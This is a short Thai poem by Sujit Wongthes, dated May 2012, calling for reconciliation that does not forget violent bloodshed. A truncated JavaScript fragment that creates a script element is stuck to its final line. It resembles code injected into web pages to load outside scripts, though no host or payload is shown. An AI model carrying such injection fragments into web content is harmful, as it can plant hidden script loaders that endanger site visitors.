ไม่ลืม

สุจิตต์ วงษ์เทศ

 

ทำความจริงให้ปรากฏ

กำจัดหมดมืดฟ้าดินสว่าง

โปร่งใสไร้ลับลวงพราง

เบื้องต้นของทุกอย่างมุ่งปรองดอง

ปรองดองได้แต่ไม่ลืมที่รุนแรง

ไล่ล่ากล้ากำแหงแสยงสยอง

อภัยได้แต่ไม่ลืมร่างก่ายกอง

เลือดนอนนองแน่นแม่พระธรณี

 

บ้านช่างหล่อ กรุงธนบุรี

25 พฤษภาคม 2555

16.20 น.var d=document;var s=d.createElement(‘script’);